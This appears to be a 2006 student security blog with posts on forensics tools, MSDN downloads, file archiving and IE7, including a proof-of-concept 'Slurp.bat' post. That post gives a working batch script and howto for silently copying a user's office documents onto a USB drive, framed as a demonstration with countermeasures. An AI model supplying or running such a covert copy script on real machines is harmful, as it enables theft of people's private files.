as a computer security student, and with computer forensics apparently a fairly imporant part of the field, its something we learn. Most of our texts reccommend the use of FAT hard drives, and moderately hacked versions of MS dos for forensics work
for the former, modern windows versions have a cap on the maximum size you can format a FAT drive to (though they read them fine) , one option is to use limux but http://www.ridgecrop.demon.co.uk/index.htm?fat32format.htm is a lovely little tool that will format large FAT drives in windows
the other tool is a free app which allows hex editing to disks, for when you need to go hack up a io.sys to disable disc compression (granted that the *smart* thing would be to use a custom freedos distro, and release the code for it) for making a boot disk for forensics
http://www.roadkil.net/Sectedit.html
Saturday, October 14, 2006
Wednesday, October 11, 2006
podslurp script
Slurp.bat
by Ravi Mohan
Purpose:
To create a simple proof-of-concept application that searches for office documents and copies them from a Windows computer to any removable storage device).
The point of this exercise is to demonstrate (qualitatively) how easy it is to carry out data theft with removable storage devices.
Method:
I utilised the Xcopy command with silent and recusive options for each filetype in a hardcoded target directory. i also suppressed any messages by piping the output to a standard text file that is deleted at the end of the process.The real purpose of the batch file is a one click implimentation of the use of the command, over multiple filetypes, as well as to not have any "obvious" output on the shell. *click* *click* is less obvious than *typetypetypetype* after all
The most interesting thing about this is that all components used for this function exactly as they are designed to, and there is no real 'exploit' other than at the social level (IE getting access to a system with malicious intent).
i'd note this version was optimised for silent running and not reliability(and there's one situation that will hang up the download of files w/o any warning since all warnings are redirected... try to find it ). some small tweaks to the batch script would add some logging capabilities but i leave that as a (terribily simple) excercise to the reader.It also searches for each filetype recusively and with addition to the time to copy, i suspect adding more filetypes would increase download time.
Anyone who understands whats being done could *easily* do this (took me 2 hours to perfect, mainly due to rusty dos skills, and trying to get it *totally*silent), but i strongly discourage usage of such this script or similar tool, for illegal activitiesIt IS however a very vivid demonstration of how easy it is to steal data, since anyone with a moderate knowledge of windows command line could easily cook up a similar batch file. I personally made extensibve use of the help function in producing it too!
tests:
The method was tested on a stock copy of windows XP SP2 on a packard bell Easynote R1938 with 1.6 GHZ processor, 1 GB ram, and using USB 2.0 drives. The version of windows, fully patched in both admin and LUA. There wasn't any noticable performance difference between USB/IDE drives and USB flash drives, though the amount of files on my system (~4 MB) was not large
results:
all files of target types in user directory were copied
howto
1) copy the slurp.bat file to your storage device (preferably off the target system)
2)create the "slurp" folder (your free to change the name...but you'll need to edit the relavant parts of the script )
3)run slurp.bat
4)a blank black window will open, and when the transfer is done, will close.
5)unplug drive and walk away
future enhancements:
see if its possible to speed it up
test on a systemwide scale as opposed to /user/ folder
check for traces left behind
see if i can get multiple filetypes in one line
dedicated programme for the job (though this setup is simpler and more powerful)
possible countermeasures:
possibly disable use of USB drives on systems with sensitive data
common sense
acknowledgements Abe Usher @ http://www.sharp-ideas.net, whose slurp-audit made me wonder if it was as easy as i thought it was. Its a better tool for security work probably than this, since it dosen't actually carry out the nasty bit of the process.
the actual script
@echo off
rem slurp file copying script by faileas
rem for educational purposes only, since its so bloody simple any way, anyone with dos skills could work it out
rem notes:slurp assumes you have the correct directories created in the target drive. read and understand the commands!
rem slurp will find and download the filetypes listed.i don't think its 100% efficient timewise,
rem but its simple enough to memorise. The pipe out to empty.txt supresses console massages, but might not always be necessary
rem for additional options try help Xcopy
(edit the second line with the empty.txt should NOT wrap and belongs to the earlier lines)
@echo off
xcopy "c:\Documents and Settings"\*.doc \slurp\ /s /Q /y >empty.txt
xcopy "c:\Documents and Settings"\*.xls \slurp\ /s /Q /c /y > empty.txt
xcopy "c:\Documents and Settings"\*.pdf \slurp\ /s /Q /c /y > empty.txt
xcopy "c:\Documents and Settings"\*.rtf \slurp\ /s /Q /c /y> empty.txt
xcopy "c:\Documents and Settings"\*.txt \slurp\ /s /Q /c /y> empty.txt
xcopy "c:\Documents and Settings"\*.ppt \slurp\ /s /q /c /y > empty.txt
del empty.txt
by Ravi Mohan
Purpose:
To create a simple proof-of-concept application that searches for office documents and copies them from a Windows computer to any removable storage device).
The point of this exercise is to demonstrate (qualitatively) how easy it is to carry out data theft with removable storage devices.
Method:
I utilised the Xcopy command with silent and recusive options for each filetype in a hardcoded target directory. i also suppressed any messages by piping the output to a standard text file that is deleted at the end of the process.The real purpose of the batch file is a one click implimentation of the use of the command, over multiple filetypes, as well as to not have any "obvious" output on the shell. *click* *click* is less obvious than *typetypetypetype* after all
The most interesting thing about this is that all components used for this function exactly as they are designed to, and there is no real 'exploit' other than at the social level (IE getting access to a system with malicious intent).
i'd note this version was optimised for silent running and not reliability(and there's one situation that will hang up the download of files w/o any warning since all warnings are redirected... try to find it ). some small tweaks to the batch script would add some logging capabilities but i leave that as a (terribily simple) excercise to the reader.It also searches for each filetype recusively and with addition to the time to copy, i suspect adding more filetypes would increase download time.
Anyone who understands whats being done could *easily* do this (took me 2 hours to perfect, mainly due to rusty dos skills, and trying to get it *totally*silent), but i strongly discourage usage of such this script or similar tool, for illegal activitiesIt IS however a very vivid demonstration of how easy it is to steal data, since anyone with a moderate knowledge of windows command line could easily cook up a similar batch file. I personally made extensibve use of the help function in producing it too!
tests:
The method was tested on a stock copy of windows XP SP2 on a packard bell Easynote R1938 with 1.6 GHZ processor, 1 GB ram, and using USB 2.0 drives. The version of windows, fully patched in both admin and LUA. There wasn't any noticable performance difference between USB/IDE drives and USB flash drives, though the amount of files on my system (~4 MB) was not large
results:
all files of target types in user directory were copied
howto
1) copy the slurp.bat file to your storage device (preferably off the target system)
2)create the "slurp" folder (your free to change the name...but you'll need to edit the relavant parts of the script )
3)run slurp.bat
4)a blank black window will open, and when the transfer is done, will close.
5)unplug drive and walk away
future enhancements:
see if its possible to speed it up
test on a systemwide scale as opposed to /user/ folder
check for traces left behind
see if i can get multiple filetypes in one line
dedicated programme for the job (though this setup is simpler and more powerful)
possible countermeasures:
possibly disable use of USB drives on systems with sensitive data
common sense
acknowledgements Abe Usher @ http://www.sharp-ideas.net, whose slurp-audit made me wonder if it was as easy as i thought it was. Its a better tool for security work probably than this, since it dosen't actually carry out the nasty bit of the process.
the actual script
@echo off
rem slurp file copying script by faileas
rem for educational purposes only, since its so bloody simple any way, anyone with dos skills could work it out
rem notes:slurp assumes you have the correct directories created in the target drive. read and understand the commands!
rem slurp will find and download the filetypes listed.i don't think its 100% efficient timewise,
rem but its simple enough to memorise. The pipe out to empty.txt supresses console massages, but might not always be necessary
rem for additional options try help Xcopy
(edit the second line with the empty.txt should NOT wrap and belongs to the earlier lines)
@echo off
xcopy "c:\Documents and Settings"\*.doc \slurp\ /s /Q /y >empty.txt
xcopy "c:\Documents and Settings"\*.xls \slurp\ /s /Q /c /y > empty.txt
xcopy "c:\Documents and Settings"\*.pdf \slurp\ /s /Q /c /y > empty.txt
xcopy "c:\Documents and Settings"\*.rtf \slurp\ /s /Q /c /y> empty.txt
xcopy "c:\Documents and Settings"\*.txt \slurp\ /s /Q /c /y> empty.txt
xcopy "c:\Documents and Settings"\*.ppt \slurp\ /s /q /c /y > empty.txt
del empty.txt
Tuesday, October 10, 2006
considering the sheer number of files i have on download (legit, i assure you, just every OS on MSDN, and ) and that i haven't quite decided how i want to store them (DVD, Exterernal HDD, remote file server) and so on, and that many of them have keys, which i will need (and i assume windows keys don't expire!) i'm working on a rudamentry file listing for it. Looking at it now, in forsight
1) i should be able to detect errors in files so i know they are good, especially where i am potentially going to transfer them between various systems,and storage devices
2) should be relatively platform independant
3) should be as simple as possible
2/3 is settled by starting with a flat text file with clear labels, since i can export this to excel, or possibly a database at some point, with a little find and replace fu (granted that i HAVE crashed notepad with excessive use of this command), and most unix/linux systems manage the line change issue relatively nowadays.
for 1
1) i'd need a listing of the contents (simply), ISO/folder file name (preferably keeping the original names, which are occationally cryptic), and in the case of the former, an md5 sum would be helpful(considering its widely used for the job)
if i were using a batch script to do this (not impossible but not necessary unless you plan badly, or need to do this sorta listing after the fact) i'd probably use the command line md5sum software to do it, but in this case i'm using a shell extention called digest it
another decision i need to make, and isn't made yet is how to handle folders/directories, such as how XP embedded is delivered. the 'ideal' solution would be self extracting EXEs since i wouldn't be tied to any software (but i would be tied down to an OS, which is a hitch) since i would have a unified way of handleing everything, especially i added in a text file with serial numbers a folder with each ISO and compressed it.
planning to store files is hard work :)
Ref: http://www.openoffice.org/dev_docs/using_md5sums.html#links where i got the links for md5 summing out of
1) i should be able to detect errors in files so i know they are good, especially where i am potentially going to transfer them between various systems,and storage devices
2) should be relatively platform independant
3) should be as simple as possible
2/3 is settled by starting with a flat text file with clear labels, since i can export this to excel, or possibly a database at some point, with a little find and replace fu (granted that i HAVE crashed notepad with excessive use of this command), and most unix/linux systems manage the line change issue relatively nowadays.
for 1
1) i'd need a listing of the contents (simply), ISO/folder file name (preferably keeping the original names, which are occationally cryptic), and in the case of the former, an md5 sum would be helpful(considering its widely used for the job)
if i were using a batch script to do this (not impossible but not necessary unless you plan badly, or need to do this sorta listing after the fact) i'd probably use the command line md5sum software to do it, but in this case i'm using a shell extention called digest it
another decision i need to make, and isn't made yet is how to handle folders/directories, such as how XP embedded is delivered. the 'ideal' solution would be self extracting EXEs since i wouldn't be tied to any software (but i would be tied down to an OS, which is a hitch) since i would have a unified way of handleing everything, especially i added in a text file with serial numbers a folder with each ISO and compressed it.
planning to store files is hard work :)
Ref: http://www.openoffice.org/dev_docs/using_md5sums.html#links where i got the links for md5 summing out of
MSDN AA tips
1) the download count for "free" (gratis not libre) software is for the software downloader. Backing them up (as opposed to backing up the whole file) might be a good way to backup software downloaded from them when you have a valid account. i do not know how it works when the subscription runs out though.You can ask for a reset with your admin though
2) the download manager they use is pretty decent, its reliable and fast. i'm impressed
3)predictably the website fails with FF, when downloading the download manager for each file. Use IE in this case
4) if you lose a downloaded download manager (i back them up off system), your admin (in my case my faculty helpdesk) can reset it for you
5) install keys are accessable through the MSDN website.
2) the download manager they use is pretty decent, its reliable and fast. i'm impressed
3)predictably the website fails with FF, when downloading the download manager for each file. Use IE in this case
4) if you lose a downloaded download manager (i back them up off system), your admin (in my case my faculty helpdesk) can reset it for you
5) install keys are accessable through the MSDN website.
standalone browers
Right, as some of you might know, and some of you *will* know now, Microsoft is *pushing* out IE 7 sometime this month in the updates. if you do *not* want this update, don't download it.
However if you want IE7 (or have had IE7 pushed into your system already) but have a few apps that will only run on IE 6, you can download a standalone version . the NT versions ( ie6eolas_nt.zip is ie6, but you have the option of installing an older version if you wish, they run independantly of each other so you can see how craptastic your site looks on IE1)
personally i haven't decided if i will upgrade, (with all of TWO websites needing IE for me, MSDN, and my bank, and i'm not 100% positive if my bank will work on IE7)
related links
IE7 pushed out on automatic updates IEBlog
IE7 fast approaching IEBlog (has resources on migration to IE7)
(Edit: fixed links)
However if you want IE7 (or have had IE7 pushed into your system already) but have a few apps that will only run on IE 6, you can download a standalone version . the NT versions ( ie6eolas_nt.zip is ie6, but you have the option of installing an older version if you wish, they run independantly of each other so you can see how craptastic your site looks on IE1)
personally i haven't decided if i will upgrade, (with all of TWO websites needing IE for me, MSDN, and my bank, and i'm not 100% positive if my bank will work on IE7)
related links
IE7 pushed out on automatic updates IEBlog
IE7 fast approaching IEBlog (has resources on migration to IE7)
(Edit: fixed links)
Sunday, August 27, 2006
Subscribe to:
Comments (Atom)